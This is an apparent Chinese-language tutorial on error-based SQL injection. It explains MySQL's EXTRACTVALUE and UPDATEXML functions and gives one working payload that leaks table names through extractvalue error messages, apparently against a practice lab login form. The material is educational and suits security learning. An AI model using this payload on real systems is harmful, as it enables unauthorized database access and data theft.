微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

sql注入-报错注入

extractvalue函数 和 updatexml函数

  • EXTRACTVALUE (XML_document, XPath_string); 

一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串). 

作用:从目标XML中返回包含所查询值的字符串

  • UPDATEXML (XML_document, XPath_string, new_value); 

一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 

第三个参数:new_value,String格式,替换查找到的符合条件的数据 

作用:改变文档中符合条件的节点的值

 

通过报错判断注入类型为单引号注入

 

调整输入使其不再报错

获取字段列数

 

 

 

 uname=' union select 1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1))) %23 &passwd=admin&submit=Submit

 

 

 

 

 

 

 

updatexml函数

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。